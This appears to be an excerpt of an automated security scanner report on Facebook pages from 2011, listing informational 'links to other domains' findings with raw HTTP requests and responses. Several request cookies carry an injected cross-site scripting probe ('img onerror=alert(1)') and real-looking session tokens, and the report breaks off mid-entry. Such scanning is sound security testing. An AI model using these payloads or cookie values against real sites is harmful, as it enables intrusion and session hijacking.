Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/ijofM1PtQgR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/iitWafmrmXE.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/tbLZ3xbV8NS.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png" alt="" width="23" height="23" /><div class="clearfix selected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.36. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/help/?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/OuCKQjrVamz.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/mT_qphTsZ8l.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png
http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Sxn9HcQx7-s.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/s6-0HGzUYdH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.27
Connection: close
Date: Thu, 05 May 2011 11:43:05 GMT
Content-Length: 20587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/OuCKQjrVamz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/s6-0HGzUYdH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Sxn9HcQx7-s.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/mT_qphTsZ8l.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/F6vZSVqitFo.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png" alt="" width="23" height="23" /><div class="clearfix selected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix HC_Tab"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png" alt="" width="23" height="23" /><div class="clearfix unselected UIImageBlock_Content UIImageBlock_ICON_Content">
...[SNIP]...
<div class="rfloat"><img class="mts async_inactive img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/JQgQHls27pw.png" width="14" height="9" /><img class="mts uiLoadingIndicatorAsync img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></div>
...[SNIP]...

16.37. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/help/?page=432

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/qdjc8Os7vL6.css
http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /help/?page=432 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613664644%2F2; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1022x1007

Response

16.38. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.39. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/mobile/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/r6TQE2hmDzI.png
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://www.microsoft.com/windowsphone

Request

Response

16.40. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/mobile/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/iYv5KPjJjnb.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

16.41. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/pages/create.php?ref_type=sitefooter

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y7/r/bQRSWpImyUZ.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif
http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/8_UVCq8pW91.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.33
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/8_UVCq8pW91.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y7/r/bQRSWpImyUZ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<h2 class="uiHeaderTitle"><img class="uiHeaderImage img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif" width="15" height="15" />Create a Page</h2>
...[SNIP]...

16.42. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
